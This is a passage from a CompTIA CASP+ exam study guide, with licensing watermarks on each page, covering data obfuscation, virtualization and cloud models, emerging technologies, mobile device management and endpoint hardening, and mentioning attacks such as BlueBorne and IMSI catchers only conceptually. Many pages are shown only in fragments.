by the merchant (credit card processor). When a credit card is used, the number
is replaced with a unique identifier (token) associated with the card holder. The
unique identifier (token) and cardholder name are provided to the credit card
processor, who is able to link the token to the credit card number and process the
transaction. In this way, sensitive data, such as the credit card number, is never
stored or transmitted and because the token is irreversible concerns regarding
unauthorized access are significantly reduced.
Scrubbing
Data scrubbing is a data integrity control mechanism designed to locate invalid,
obsolete, redundant or outdated information from a database or data warehouse.
From the perspective of cybersecurity, data scrubbing can be used to locate
sensitive data and modify it in a way that protects against unauthorized disclosure
or use, such as the presence of data in a test or development environment where
real account numbers, personal identifiers, or other sensitive data should not be
stored and can be replaced with placeholder values.
Anonymization
Data anonymization is focused on the protection of privacy data.Anonymization
describes how information that could be used to uniquely identify an individual is
removed from data so that the data can be shared with internal groups or third
parties in a way that does not violate privacy laws and/or regulations.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
138 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Development Models and
Best Practices
7
1. In which stage of the data life cycle is data shared using various
mechanisms, such as email, network folders, websites, or cloud storage?
4. What is the name of the data obfuscation method that replaces sensitive
data with an irreversible value?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 139
Lesson 5
Summary
6
This lesson covered a wide range of topics related to the integration and protection
of software. The boundaries between software and hardware are becoming more
and more difficult to discern, and some of the techniques used to protect physical
infrastructure are no longer available as more and more equipment is replaced with
software-defined counterparts. Understanding how to incorporate well-matched
testing and evaluation methods is a critical part of protecting both software
applications themselves, as well as the infrastructure they frequently represent.
Key Takeaways
• Modern software is highly integrated with many other applications and
platforms.
• Software should be tested “early and often” to identify problems before they
become more impactful.
• Data should be classified and protected during all phases of its life cycle.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 6
Explain Virtualization, Cloud, and
Emerging Technology
1
LESSON INTRODUCTION
Virtualization and cloud platforms have been in use for many years and continue
to grow and adapt with time. As cloud platforms increase in features, capacity, and
power, the pace of scientific discoveries and technological breakthroughs increases
as well.
Emerging technologies are at a pivotal stage of development. Computing power
and software tools have matured to a point where virtual reality and true reality
are practically indistinguishable. These advances produce some fun and exciting
products, such as immersive video games and personal assistive technology e.g.,
Siri, Alexa, and the Google Assistant. In the other extreme, adversaries use the
same tools to spread misinformation, uncover previously unknown technological
weaknesses, and break encryption. A technological arms race is underway as
advanced industrial nations pump billions of dollars into research to develop a
fully operational quantum computer, which will undoubtedly usher in a new era of
technological advancements.
Lesson Objectives
In this lesson, you will:
• Learn about virtualization and virtualization technologies.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
142 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 6A
Explain Virtualization and Cloud
Technology
2
The rapid adoption of cloud technologies is a direct result of the ever increasing
set of features, limitless performance characteristics, and unique service offerings
made available by these new and rapidly developing platforms. Cloud platforms
are helping organizations solve complex research problems, analyze enormous
data sets, and offer compelling consumer services and solutions. To do this, several
deployment, service, and storage models are available to handle all of these
requirements and the associated data. Using cloud to solve problems such as these
requires specialized knowledge to safely build or migrate to cloud service offerings.
Unfortunately, misconfiguration of cloud services is the number one cause of data
breach in the cloud and, when coupled with the vast amounts of sensitive data now
being stored and processed, the impacts are often catastrophic.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 143
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
144 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
container, for instance). Alternatively, the containers might run separate application
processes, in which case the variables and libraries required by the application
process are added to the container.
One of the best-known container virtualization products is Docker (docker.com).
Containerization underpins many cloud services. In particular, it supports
microservices and serverless architecture. Containerization is also being widely
used to implement corporate workspaces on mobile devices.
Emulation
Emulation is similar in function to virtualization but provides distinct differences.
For example, virtualization only needs to imitate some of the underlying physical
hardware because the virtual machine must use the same hardware architecture,
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 145
QEMU running a 32-bit ARM binary on a 64-bit Linux system. (Screenshot courtesy of qemu.com.)
Some examples of emulation software include the very versatile QEMU (https://
www.qemu.org/); the Wine emulator for running applications designed for Windows
on Linux, macOS, and BSD; and the Android Emulator available within Googleʼs
Android Studio. The following chart lists the websites for some popular emulators.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
146 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 147
A Hybrid cloud uses any combination of these deployment models. A hybrid public-
private cloud is by far the most common, such as is the case with an organization that
maintains a traditional datacenter but has migrated email to Office 365.
Business Directives
• Cost—Cloud adoption should focus on solutions that best achieve operational
goals while maintaining the confidentiality, integrity, and availability of data, not
simply cost. There are several cost models associated with running services in
the cloud, such as consumption-based or subscription-based, and most cloud
providers have tools designed to help estimate costs for migrating existing
workloads from on-premise to cloud.
• AWS - https://aws.amazon.com/products/
• Azure - https://azure.microsoft.com/en-us/services/
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
148 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 149
Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS.
(Screenshot used with permission from Amazon.com.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
150 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
to reflect the new address, and any static references to the VMʼs previous IP will no
longer point to the intended target and so should be changed. Static IP addresses
can be purchased from the cloud provider to avoid this issue.
Additional limitations associated with Virtual Private Cloud (VPC) connection (VPC
Peering) limitations are outlined in the following chart.
Configuration Description
Overlapping CIDR Blocks Two VPCs cannot be connected if they each use the
same IPv4 CIDR blocks, or if the blocks overlap.
Transitive Peering If three VPCs are connected as A-B-C, traffic cannot be
directly routed from A to C or from C to A. Connectivity
between A and C requires the configuration of a new
VPC peering connection and only so long as the IPv4
CIDR blocks in A and C do not overlap.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 151
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
152 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Virtualization and Cloud Technology
3
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 153
Topic 6B
Explain Emerging Technologies
6
Since its inception, the computing field has enabled a countless number of scientific
breakthroughs and revolutionized the way people and organizations work, play,
and communicate. By extension, computers and technology have also transformed
conflict, espionage, and warfare. One thing is for certain, the technology we use in
the next decade will look a lot different than the technology we use today. To this
point, consider that in 2010 Apple released the iPhone 4, which was considered
to be a significant advancement at that time. Some of the phoneʼs specifications
included a 3.5“ display, up to 32 GB of storage, and 512 MB of RAM.
The future will be different. From todayʼs view, we are seeing significant advances in
artificial intelligence, quantum computing, natural language processing, and many
other fields. Some of the impacts these technologies will have on us are yet to be
fully understood, but it is important to consider that technological advancements
benefit both cyber defenders as well as cyber adversaries.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
154 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Distributed Consensus
Distributed consensus in a distributed/decentralized system is a difficult problem to
solve but describes the way in which all systems come to an agreement regarding a
particular computation in order to maintain the overall integrity of a distributed system,
such as a blockchain. The distributed consensus process includes an assumption that
some of the systems in the distributed system are malicious and so resorts to a type of
voting mechanism whereby participating systems identify the computational value they
deem to be accurate. The value with the most “votes” is accepted.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 155
A Microsoft presentation at BlackHat illustrates some of the techniques that can be used
to mitigate adversarial AI (i.blackhat.com/us-18/Thu-August-9/us-18-Parikh-Protecting-
the-Protector-Hardening-Machine-Learning-Defenses-Against-Adversarial-Attacks.pdf).
Virtual/Augmented Reality
An extension to the topic of artificial intelligence, augmented reality emulates a real-
life environment through computer-generated sights and sounds and sometimes
also computer-generated smell and touch. The applications of augmented, or
virtual, reality are diverse, and some of the more popular applications include
simulations of adversary territories to train combat soldiers and pilots, video
games, and overlaying search and map data onto real world objects, for example
holding up a phone camera to a street so that it can highlight various items in view,
such as restaurants (including their ratings), subway entrances, street names, and
many other items. When coupled with facial recognition, this type of augmented
reality can provide real-time insights of the people within view, including names,
social media handles, and many other data points. This latter scenario offers
a compelling solution for police and military operations but also raises several
significant and troubling privacy issues as well.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
156 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Deep Learning
Deep learning is a type of machine learning that deconstructs knowledge into a
series of smaller, simpler parts. Complex concepts are broken down into simpler
elements of knowledge so that they can be used to interpret data. In a deep
learning scenario, the system isnʼt provided with human-directed facts, filters, or
rules but instead is left to independently interpret data and classify it as a certain
category, for example normal or suspect. In terms of network traffic analysis,
deep learning can take complex, abstract concepts (such as malicious traffic)
and break them down into simpler, more concrete concepts (such as half-open
TCP connections). Ultimately, a deep learning system determines which simpler
concepts are applicable in order to identify a solution to an abstract problem. From
the viewpoint of cybersecurity, deep learning systems may be able to discover
threats and vulnerabilities for which there is no known precedent. Other examples
of deep learning include natural language processing, whereby a computer has the
ability to understand written or spoken language in a similar way as humans, and
deep fakes which represent computer-generated images or video of a person that
appear to be real but are instead completely synthetic and artificially generated. Of
important and related note is the concept of biometric impersonation whereby the
physical traits and characteristics of a person can be replicated. Such mechanisms
can be adapted to bypass multi-factor authentication mechanisms designed to
improve the accuracy of authentication controls, such as facial or voice recognition,
or in passwordless authentication schemes that rely on biometric features in
place of passwords.
Perhaps one of the most well-known applications, and practical examples, of how
deep-learning artificial intelligence and natural language processing work together
was demonstrated by IBMʼs Watson computer system when it participated as a
regular contestant on the Jeopardy! TV game show in 2011. IBMʼs Watson competed
against the showʼs two most successful Jeopardy! contestants in a game where
players must answer general knowledge questions. Watson won the first show,
which marked a major milestone in the development of deep learning and natural
language processing.
Many more advancements have been made since the Jeopardy! game show. More
information regarding IBMʼs artificial intelligence research initiatives is available at
https://www.research.ibm.com/artificial-intelligence/.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 157
Another well known example of the application of artificial intelligence and machine
learning can be observed in robotics. Boston Dynamics has developed several robot
solutions that perform traditional manufacturing tasks but also operate in much
more advanced capacities. Two examples include SPOT ,which resembles a dog,
and ATLAS, which is a humanoid robot.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
158 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Homomorphic Encryption
Homomorphic encryption is principally used to share privacy-sensitive data sets.
When a company collects private data, it is responsible for keeping the data secure
and respecting the privacy rights of individual data subjects. Companies often want
to use third parties to perform analysis, however. Sharing unencrypted data in
this scenario is a significant risk. Homomorphic encryption is a solution for this as
it allows the receiving company to perform statistical calculations on fields within
the data while keeping the data set as a whole encrypted. In another example,
performing analysis on sensitive medical data (such as DNA) can be performed to
reveal important statistical or other analytic information without exposing sensitive
information.
Some terms related to homomorphic encryption are listed below:
Private Information Retrieval (PIR) protocol allows the retrieval of information
without revealing which item is actually collected.
Secure Two-Party Computation, or Secure Function Evaluation (SFE) allows two
parties to evaluate inputs without revealing their results.
Private Function Evaluation (PFE) is a specific example of Secure Multi-Party
Computation (MPC/SMPC), which describes calculations performed by more than
one system whereby the function used to perform the calculations is only known by
a single party.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 159
All of these concepts work together to allow for the processing of data while
it still exists in a protected state, significantly reducing the risk of exposure or
unauthorized access.
Understanding 3D Printing
3D printing involves the use of special purpose “printers” that can construct objects
by depositing and/or solidifying special materials, layer by layer, under the careful
control of a computer and specialized computer-aided design software.
3D printers cover a wide range of scale and capability, from home-hobbyist
equipment to industrial scale systems. Prusa Research creates popular open-
source 3D printing devices and software, while 3D Systems creates industrial-scale
equipment that can be used to manipulate a wide range of materials, including metal.
3D printing can be used in many helpful ways and has resulted in advancements
in healthcare, dentistry, and transportation, just to name a few. 3D printers
can craft incredibly accurate components at a fraction of the cost of traditional
manufacturing processes. In addition, 3D printing can enable organizations and
individuals to craft components on-demand and eliminate the need to share
designs or plans which may lead to intellectual property theft.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
160 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
In contrast to this, 3D printing also presents several challenges. For the same
reasons previously identified, 3D printers allow for private manufacturing of parts
and equipment. The potential risks posed by this were clearly represented in 2012
when the US group Defense Distributed published freely available 3D printer plans
for download that could be used to produce a firearm.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 161
Review Activity:
Emerging Technologies
7
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
162 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 6
Summary
6
This lesson explored several leading-edge technologies that are rapidly becoming
mainstream. While the power and versatility of virtualization and cloud platforms
have been widely observed in recent years, new extensions and adaptations
of these tools are leading to a new era of computing. In light of this, many
organizations are facing difficulty when adopting these new platforms and fall
victims to new types of attacks and vulnerabilities exposed via misconfiguration and
mistakes.
As computer platforms and software continue to evolve, the boundaries between
real and fabricated are becoming blurred. IBM, Google, Facebook, Boston Dynamics,
NASA, and many other organizations are locked in a race to stay at the forefront of
these technologies and adapt ways to use this knowledge to solve major scientific
and humanitarian problems.
Key Takeaways
• Virtualization has evolved to include more efficient methods, such as application
and container-based virtualization.
• Cloud platforms provide unique tools and solutions that require specialized
training and knowledge to implement in a safe and secure way.
• Artificial intelligence solutions are able to mimic the real world in ways that are
undetectable by simple observation.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 7
Exploring Secure Configurations and
System Hardening
1
LESSON INTRODUCTION
This lesson will explore ways to harden individual devices and equipment in order
to protect them from common threats. A great deal of device hardening efforts
are focused on securing the operating system. It is important to understand these
techniques but also to understand the software and tools available to centrally
manage secure configurations and support the ongoing need to identify, protect,
detect, respond, and recover from threats targeting device hardware and software.
Lesson Objectives
In this lesson, you will:
• Explore Mobile Device Management software.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
164 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 7A
2
Mobile devices have replaced the ubiquitous desktop computer in many important
ways. Modern mobile devices are expensive, powerful, and can store large amounts
of data, including data types that are not associated with traditional computers such
as text messages, geographic location data, and large volumes of photographic and
video content. For all of these same reasons, mobile devices pose a significant threat
to enterprise security. To balance the collaboration and productivity needs of staff
and employees, these devices must be carefully secured through the implementation
of centralized configuration controls and special protections for apps and data.
Feature Description
Application Control Provides the capability to install, configure, block and/or
remove apps from a device.
Passwords/Passcodes Enforces password quality policies or password protection
for individual apps. This includes enforcing pin-codes,
patterns and/or biometric authentication.
MFA Requirements Can be enabled and enforced to protect access to
corporate resources from a managed device and
also used during device enrollment to protect against
unauthorized access. Using conditional access
configurations, MFA can be set as a requirement only
under certain circumstances, such as geographic location
of the device.
Token-based Access Associated with network access control (NAC), token-
based access requires an enrolled device to provide a
token issued by an IAM solution in order to gain access to
network resources.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 165
Feature Description
Patch Repository Managed devices can be centrally patched and device
patches can be distributed to devices in a controlled and
scheduled manner by the MDM.
Device Certificates
Trust certificates—these represent certificates used to globally identify trusted
devices within an organization. A single certificate is used, and often times pushed
to enrolled devices, and provides a simple mechanism to identify a trusted device.
While simplicity is the greatest advantage to this approach, anyone able to obtain
and/or copy the certificate can use it to enable access for any device, and any
situation that requires the certificate to be revoked will impact all devices using the
certificate.
User specific certificates—when integrated with PKI, an MDM solution can
obtain and distribute user-specific certificates that can be used to enable device
authentication, more accurately identify individual devices, and allow for more
granular control, or revocation, of access.
Firmware Over-the-Air
A baseband update modifies the firmware of the radio modem used for cellular,
Wi-Fi, Bluetooth, NFC, and GPS connectivity. The radio firmware in a mobile device
contains an operating system that is separate from the end-user operating system
(for example, Android or iOS). The modem uses its own baseband processor and
memory, which boots a real-time operating system (RTOS). An RTOS is often used
for time-sensitive embedded controllers of the sort required for the modulation
and frequency shifts that underpin radio-based connectivity.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
166 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
The procedures for establishing radio connections are complex and require
strict compliance with regulatory certification schemes, so incorporating these
functions in the main OS would make it far harder to bring OS updates to market.
Unfortunately, baseband operating systems have been associated with several
vulnerabilities over the years, so it is imperative to ensure that updates are applied
promptly. These updates are usually pushed to the handset by the device vendor,
often as part of OS upgrades. The updates can be delivered wirelessly, either
through a Wi-Fi network or the data connection, referred to as over the air (OTA).
A handset that has been jailbroken or rooted might be able to be configured to
prevent baseband updates or apply a particular version manually, but in the general
course of things, there is little reason to do so.
There are various ways of exploiting vulnerabilities in the way these updates
work. A well-resourced attacker can create an “evil base station” using a Stingray/
International Mobile Subscriber Identity (IMSI) catcher. This will allow the attacker
to identify the location of cell devices operating in the area. In some circumstances
it might be possible to launch a man-in-the-middle attack and abuse the firmware
update process to compromise the phone.
Remote Wipe
Remote wipe means that if a handset is lost or stolen it can be reverted back to
factory defaults and/or cleared of any sensitive data (sanitization). Some utilities
may also be able to wipe plug-in memory cards too. The remote wipe could be
triggered by several incorrect passcode attempts or by enterprise management
software. Other features include backing up data from the phone to a server
first and displaying a “Lost/stolen phone—return to XX” message on the handset.
A thief can prevent a remote wipe by ensuring the phone cannot connect to
a communications network by placing the device in a faraday bag or enabling
“airplane mode,” which shuts off all forms of wireless connectivity including
mobile, Wi-Fi, Bluetooth, and NFC.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 167
The most recent generation (802.11ax) is being marketed as Wi-Fi 6 and, as a result,
earlier standards are retroactively named Wi-Fi 5 (802.11ac) and Wi-Fi 4 (802.11n).
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
168 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
signals emitted by NFC from several feet away, giving an attacker the ability to
eavesdrop from a more comfortable distance. An attacker with a reader may also
be able to skim information from an NFC device in a crowded area, such as a busy
train. An attacker may also be able to corrupt data as it is being transferred through
a method similar to a DoS attack—by flooding the area with an excess of RF signals
to interrupt the transfer.
Skimming credit cards can provide an attacker with the full card number and its
expiration date. Performing this same task via NFC is much more difficult as the
attacker must provide a valid merchant account meaning that fraudulent transactions
can be detected quickly.
Bluetooth
Bluetooth is a short-range wireless communication technology that can be used
to create wireless personal area networks (WPANs). Common to mobile devices,
laptops, and some desktops, Bluetooth is typically used to connect keyboards, mice,
headsets, wearables, and a wide variety of IoT devices.
There are several attacks against Bluetooth, but one of the most significant recent
attacks is the BlueBorne attack. BlueBorne allows an attacker to gain complete
control of a device and does not require the target device to be connected, or
paired, with the attacker. The BlueBorne attack can compromise Windows, Android,
and Apple devices and is described in more detail on the Armis website, who were
the first to report the vulnerability. https://www.armis.com/blueborne/
Peripherals
It is very common to extend the functionality of devices by adding various
peripherals to them. Some commonly used peripheral devices include keyboards,
mice, speakers/headphones, and chargers/charge-banks. Peripherals can be used
as an attack tool by manipulating how they operate, including changes to hardware,
software, and device privacy settings. User awareness of rogue peripherals is
especially important as staff and employees often borrow/share and acquire
peripherals from many untrusted sources. Rogue peripherals will look and act as
expected but, because of the access they require to operate, can perform several
malicious actions, such as triggering a device to download malware and/or emulate
keyboard and mouse/touch actions to perform a series of tasks. An effective way to
identify and protect from rogue devices is to deploy endpoint protection software
which includes rogue device detection.
Tethering
A smartphone can share its Internet connection with another device, such as a
PC. Where this connection is shared over Wi-Fi with multiple other devices, the
smartphone can be described as a hotspot. Where the connection is shared
by connecting the smartphone to a PC over a USB cable or with a single PC via
Bluetooth, it can be referred to as tethering. However, the term “Wi-Fi tethering” is
also quite widely used to mean a hotspot. This type of functionality would typically
be disabled when the device is connected to an enterprise network as it might be
used to circumvent security mechanisms, such as data loss prevention or a web
content filtering policies.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 169
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
170 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Android Marshmallow (6.0.1) and earlier versions implement full disk encryption
(FDE) with dm-crypt and a 128-bit AES key. This method of protection limits
functionality as no apps running on the device can access storage until the
device password has been entered. Starting with Android 7 (Nougat), file-based
encryption (FBE) was introduced and enabled the use of different keys to protect
storage and independent unlocking of files. In addition, apps are able to operate
in a limited capacity even if the password has not been entered, this is helpful as
it allows applications to still provide alarms or perform tasks related to assistive
technologies.
Android 9 (Pie) supports metadata encryption, which makes use of hardware
support. Metadata encryption extends the functionality of file-based encryption by
encrypting any items not protected by FBE.
Apple iOS devices use a 256-bit unique ID (UID) that is specific for each device and
stored in the deviceʼs hardware. The UID is combined with the user password in
order to secure data stored on the device.
VPN Settings
Mobile devices have broad support for VPN connectivity and can be implemented in
three different ways.
OS Level—Offers comprehensive protection of device traffic due to the fact that
they operate at a low-level of the operating system and capture all device traffic as
a result. OS level VPN can be configured to operate as “always-on.”
App Level—Sometimes referred to as per-app VPN, app level VPNs can be
configured to protect user data by using system VPN APIs or to protect the traffic
generated by a single app.
Web-Based—These VPNs are used within a browser to protect traffic but are
also commonly used to mask/change the deviceʼs true location to bypass geo-
restrictions and firewall restrictions.
Location Services
Location Services refers to the methods used by the OS to calculate the deviceʼs
geographical position. A device with a global positioning system (GPS) sensor
can report a highly accurate location when outdoors. Location services can also
triangulate to cell towers, Wi-Fi hotspots, and Bluetooth signals to supplement GPS
or to provide an alternative locating mechanism if GPS is not available or supported.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 171
Cisco Umbrella DNS activity summary report showing various categories of requests
(Screenshot courtesy of Cisco Systems, Inc. https://umbrella.cisco.com/blog/a-guided-tour-
of-the-opendns-umbrella-dashboard.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
172 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Firefox browser DoH setting, which is enabled by default (Screenshot courtesy of Mozilla.)
Corporate Owned
Corporate owned, business only (COBO)—the device is the property of the
company and may only be used for company business.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 173
• Phonebook/Contacts
• Calendar information
• Photo/Audio/Video files
• Documents
• Application data
• Location/geolocation information
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
174 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Wireless Eavesdropping
One of the greatest features, and biggest liabilities, of mobile devices is their wide
range of wireless communication capabilities. Voice and data communications
can occur via many methods, including cellular, Wi-Fi, and Bluetooth (such as a
headset) connections. All of these communication channels are susceptible to
eavesdropping or on-path attacks designed to intercept and/or modify traffic. The
use of these communication channels necessitates the use of encryption to reduce
the possibility of data exposure resulting in business or personal data theft.
In addition, Bluetooth, in particular, enables the physical reconnaissance of devices
that may otherwise go unseen. Using tools such as RaMBLE, the type and location of
any Bluetooth-enabled device can be easily identified and many devices otherwise
safely stored out of sight (such as in a car glovebox or trunk) can be easily located
and consequently stolen.
Rooting
Rooting—this term is associated with Android devices. Some vendors provide
authorized mechanisms for users to access the root account on their device. For
some devices it is necessary to exploit a vulnerability or use custom firmware.
Custom firmware is essentially a new Android OS image applied to the device. This
can also be referred to as a custom ROM, after the term for the read only memory
chips that used to hold firmware.
Root-level access can also be obtained on Android devices by using what is
referred to as a systemless root - meaning that the system partitions are not
modified. This method makes it harder to detect that rooting has been performed
as modifications are stored in the boot partition of the device instead of changing
original system files.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 175
Sideloading
Android allows for the selection of different stores and installation of untrusted
apps from any third party, if this option is enabled by the user. With unknown
sources enabled, untrusted apps can be downloaded from a website and installed
using the .apk file format. This is referred to as sideloading.
Conversely, a management suite might be used to prevent the use of third-party
stores or sideloading and block unapproved app sources.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
176 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Containerization
Containerization allows the employer to manage and maintain the portion of the
device that interfaces with the corporate network. An enterprise workspace with
a defined selection of apps and a separate container is created. This container
isolates corporate apps from the rest of the device. There may be a requirement for
additional authentication to access the workspace.
The container can also enforce storage segmentation. With storage
segmentation, the container is associated with a directory on the persistent
storage device that is not readable or writable by apps that are not in the
container. Conversely, apps cannot write to areas outside the container,
such as external media or using copy and paste to a non-container app. App
network access might be restricted to a VPN tunneled through the organizationʼs
security system.
The enterprise is thereby able to maintain the security it needs, without having to
enforce policies that affect personal use, apps, or data.
Containerization also assists content management and data loss prevention
(DLP) systems. A content management system tags corporate or confidential
data and prevents it from being shared or copied to unauthorized external
media or channels, such as non-corporate email systems or cloud storage
services.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 177
Additional Reading
US-CERT Cyber Threats to Mobile Phones
https://us-cert.cisa.gov/sites/default/files/publications/cyber_threats_to_mobile_
phones.pdf
US-CERT Technical Information Paper - Cyber Threats to Mobile Devices
https://www.us-cert.gov/reading_room/TIP10-105-01.pdf
NIST Mobile Device Security: Corporate-Owned Personally-Enabled (COPE)
https://doi.org/10.6028/NIST.SP.1800-21
NIST Guidelines for Managing the Security of Mobile Devices in the Enterprise:
SP 800-124
https://doi.org/10.6028/NIST.SP.800-124r2-draft
Bootloader Security
Newer devices take considerable care to protect the bootloader of a device from
tampering. The bootloader offers a first line of defense in device security by
validating that it is not loading an unauthorized or tampered operating system,
that unauthorized tools cannot access the contents in flash memory, and that the
bootloader itself remains intact. To do this, device manufactures use eFuses, which
enable permanent writes to flash storage. eFuses allow for cryptographic keys to
be permanently “etched” into the device so that they can be trusted and used to
validate the integrity of the software used during the boot process.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
178 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Enterprise Mobility Protections
3
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 179
Topic 7B
Implement Endpoint Protection
6
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
180 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
nonstandard port. For example, an HTTP server might be configured to use 8080
rather than 80. Conversely, malware may try to send nonstandard data over an
open port. An intrusion detection system should detect if network data does not
correspond to the expected protocol format.
It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products
that you are running. Hardware and Software versions must be checked to verify
that they are still actively supported and patched by the vendor, and End of Life
(EOL) or End of Support (EoS) equipment and/or software must be removed as this
designation means that the devices no longer receive security updates (patches)
and will not be serviced or supported by the vendor if issues or outages occur.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 181
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
182 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
• A patch test environment where urgent and important patches can be installed
and tested for functionality and impact prior to deployment into production.
• Capabilities that include detailed logs of patching activity that can be used
to evaluate and monitor the deployment of patches to ensure successful
deployment and installation.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 183
Feature Description
Secure Encrypted Enclaves/ CPU Instructions, dedicated secure subsytems
Memory Encryption in SoC, or a protected region of memory in a
database engine designed to protect sensitive
information by only allowing data to be
decrypted on the fly within the CPU, SoC, or
protected region.
Shell Restrictions Due to the fact that the shell can interact
directly with the operating system, either
directly or via scripts, access to the shell should
be strictly limited.
